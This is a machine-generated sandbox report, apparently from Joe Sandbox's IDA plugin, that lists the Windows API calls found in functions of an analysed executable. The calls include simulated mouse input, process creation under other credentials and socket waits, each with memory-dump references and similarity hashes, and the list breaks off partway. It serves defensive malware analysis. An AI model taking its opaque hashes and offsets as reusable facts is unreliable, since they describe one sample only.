                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE51C4F0A01209EFDF20CF64C984BADBBF4AF55328F148159E625972D1D770A944FB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00F18E7C
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00F18E89
                                                                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00F18EAD
                                                                                                                                                                                                                                                      • #16.WSOCK32(?,?,00000000,00000000), ref: 00F18EC5
                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00F18EF7
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00F18F6A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$_strlenselect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2217125717-0
                                                                                                                                                                                                                                                      • Opcode ID: 4a817653d0d9d6cdcc329df55678e404a3b195652f9c46d32747f4d1e8832274
                                                                                                                                                                                                                                                      • Instruction ID: ad16d87d03960e2a186a98872df8a4c499fd13192b633b237932af1e9d1af7d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a817653d0d9d6cdcc329df55678e404a3b195652f9c46d32747f4d1e8832274
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A441C371900208AFCB14EBA4CE95FEEB7B9AF58350F104659F51AA72D1DF309E42DB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
                                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?,?), ref: 00EDAC2A
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EDAC8E
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EDACAB
                                                                                                                                                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EDACBC
                                                                                                                                                                                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00EDAD06
                                                                                                                                                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00F3E673
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2592858361-0
                                                                                                                                                                                                                                                      • Opcode ID: f39aba53ca13bede0469ea11052c0fe1bff5a953dc9162e46e732f50c1864231
                                                                                                                                                                                                                                                      • Instruction ID: c1a3654484b7d0d1a738631bb6535f48cb9baad034305acb62c073b40c4fde52
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f39aba53ca13bede0469ea11052c0fe1bff5a953dc9162e46e732f50c1864231
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0441AE705042049FC710DF24DC84FBA7BE8FF69334F18066AF9A4962A1D7319946EB62
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00F81628,00000000,00F81628,00000000,00000000,00F81628,?,00F3DC5D,00000000,?,00000000,00000000,00000000,?,00F3DAD1,00000004), ref: 00F2E40B
                                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00F2E42F
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00F81628,00000000), ref: 00F2E48F
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00F2E4A1
                                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00F2E4C5
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F2E4E8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                                                                                                      • Opcode ID: 0b4544800ca22748e1ac33a63e88f17a23b1a32caf3a844038382a0e4ca1adc3
                                                                                                                                                                                                                                                      • Instruction ID: 328e867519c3a5eb844cf5de1a4a40dc035d3a32c7a3a64a51fae60e59278e1a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b4544800ca22748e1ac33a63e88f17a23b1a32caf3a844038382a0e4ca1adc3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC418338A01154EFDB22DF24D499F947BF1BF19324F2841B9EA588F2A2C735E841EB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F098D1
                                                                                                                                                                                                                                                        • Part of subcall function 00EDF4EA: std::exception::exception.LIBCMT ref: 00EDF51E
                                                                                                                                                                                                                                                        • Part of subcall function 00EDF4EA: __CxxThrowException@8.LIBCMT ref: 00EDF533
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F09908
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00F09924
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00F0999E
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F099B3
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F099D2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2537439066-0
                                                                                                                                                                                                                                                      • Opcode ID: 954c60c498cefb59453407a3b08bd9e83f8cc566e3f3fe5471c77679b0dbccfc
                                                                                                                                                                                                                                                      • Instruction ID: 59a3ecdd90a7a5baa1c46bd1b329e65e6f318999fedbe9bb277aabb1388c34a7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 954c60c498cefb59453407a3b08bd9e83f8cc566e3f3fe5471c77679b0dbccfc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD316171A00109ABDB10EF94DC85E6EB7B8FF85710B1480A9FD05AB286D774DE11EBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00F177F4,?,?,00000000,00000001), ref: 00F19B53
                                                                                                                                                                                                                                                        • Part of subcall function 00F16544: GetWindowRect.USER32(?,?), ref: 00F16557
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00F19B7D
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00F19B84
                                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F19BB6
                                                                                                                                                                                                                                                        • Part of subcall function 00F07A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F07AD0
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F19BE2
                                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F19C44
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4137160315-0
                                                                                                                                                                                                                                                      • Opcode ID: 73906bc4db928c0f6cb08c03ac136af5581d9e9087c144e4557dfa342375575c
                                                                                                                                                                                                                                                      • Instruction ID: dbc455fa9357721c37b133cbd9e8248df0477554b4237cd46e6b90ac3d062a0c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73906bc4db928c0f6cb08c03ac136af5581d9e9087c144e4557dfa342375575c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F831F072608309ABC710DF14DC49F9BB7E9FF89314F00092AF985D7191DA70EA44DB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EFAFAE
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00EFAFB5
                                                                                                                                                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EFAFC4
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00EFAFCF
                                                                                                                                                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EFAFFE
                                                                                                                                                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00EFB012
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1413079979-0
                                                                                                                                                                                                                                                      • Opcode ID: 865a22725b911741e33f52280311e292de76e1245897ebb88e8190cdbadee81b
                                                                                                                                                                                                                                                      • Instruction ID: ebc605d7afd3c7e1de36de509847e8af16b351bc3ac67dc9c46e8baa10b12a8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 865a22725b911741e33f52280311e292de76e1245897ebb88e8190cdbadee81b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9214FB220020DABDF128F94DD49FEE7BA9AB45308F085025FE05AA161D3759D61EB61
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EDAFE3
                                                                                                                                                                                                                                                        • Part of subcall function 00EDAF83: SelectObject.GDI32(?,00000000), ref: 00EDAFF2
                                                                                                                                                                                                                                                        • Part of subcall function 00EDAF83: BeginPath.GDI32(?), ref: 00EDB009
                                                                                                                                                                                                                                                        • Part of subcall function 00EDAF83: SelectObject.GDI32(?,00000000), ref: 00EDB033
                                                                                                                                                                                                                                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F2EC20
                                                                                                                                                                                                                                                      • LineTo.GDI32(00000000,00000003,?), ref: 00F2EC34
                                                                                                                                                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F2EC42
                                                                                                                                                                                                                                                      • LineTo.GDI32(00000000,00000000,?), ref: 00F2EC52
                                                                                                                                                                                                                                                      • EndPath.GDI32(00000000), ref: 00F2EC62
                                                                                                                                                                                                                                                      • StrokePath.GDI32(00000000), ref: 00F2EC72
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                                                                                                      • Opcode ID: 4576ea922ce8b03a0476f663877ad4d6d1894b2500535077d22831add9255211
                                                                                                                                                                                                                                                      • Instruction ID: 5d5090283aa13ccf878be44841b1f43dd0f9467b9391c0c9b9f929a5788b2dc9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4576ea922ce8b03a0476f663877ad4d6d1894b2500535077d22831add9255211
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6115B7600014CBFEF029F94DC88EEA7F6DEF09360F148122BE088A160D7719D56EBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EFE1C0
                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EFE1D1
                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EFE1D8
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00EFE1E0
                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00EFE1F7
                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 00EFE209
                                                                                                                                                                                                                                                        • Part of subcall function 00EF9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00EF9A05,00000000,00000000,?,00EF9DDB), ref: 00EFA53A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 603618608-0
                                                                                                                                                                                                                                                      • Opcode ID: 1b66708dc2784a8aab89592c9adcd268ecaa224631735c2b45303095a628b783
                                                                                                                                                                                                                                                      • Instruction ID: 77f871acf1ddeab4d0d238bc869852baf65fa3fc21ca7ca13104012e50ef518e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b66708dc2784a8aab89592c9adcd268ecaa224631735c2b45303095a628b783
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49018FB9A00618BFEB109BA68C45B5EBFB8EB59751F004066EE04AB391D6709C00CBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __init_pointers.LIBCMT ref: 00EE7B47
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: __initp_misc_winsig.LIBCMT ref: 00EE125E
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EE7F51
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EE7F65
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EE7F78
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EE7F8B
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EE7F9E
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EE7FB1
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EE7FC4
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EE7FD7
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EE7FEA
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EE7FFD
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EE8010
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EE8023
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EE8036
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EE8049
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EE805C
                                                                                                                                                                                                                                                        • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00EE806F
                                                                                                                                                                                                                                                      • __mtinitlocks.LIBCMT ref: 00EE7B4C
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00F7AC68,00000FA0,?,?,00EE7B51,00EE5E77,00F76C70,00000014), ref: 00EE7E41
                                                                                                                                                                                                                                                      • __mtterm.LIBCMT ref: 00EE7B55
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00EE7B5A,00EE5E77,00F76C70,00000014), ref: 00EE7D3F
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7BBD: _free.LIBCMT ref: 00EE7D46
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7BBD: DeleteCriticalSection.KERNEL32(00F7AC68,?,?,00EE7B5A,00EE5E77,00F76C70,00000014), ref: 00EE7D68
                                                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00EE7B7A
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00EE7BA3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2942034483-0
                                                                                                                                                                                                                                                      • Opcode ID: f42178a6569c4e41e8d6575a0f33fcbe54efbe34121bd6cfd7609f12d03de861
                                                                                                                                                                                                                                                      • Instruction ID: 836e7c7185d4e2bc4b2d7e59a5c335591fdba9a9383f8d1d09a7aadbe81a20a1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f42178a6569c4e41e8d6575a0f33fcbe54efbe34121bd6cfd7609f12d03de861
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08F0903212D7DE19E72877767C06A4B3BD69F02734B2026A9F8E4F91E2FF2188425161
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EC281D
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EC2825
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EC2830
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EC283B
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EC2843
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC284B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
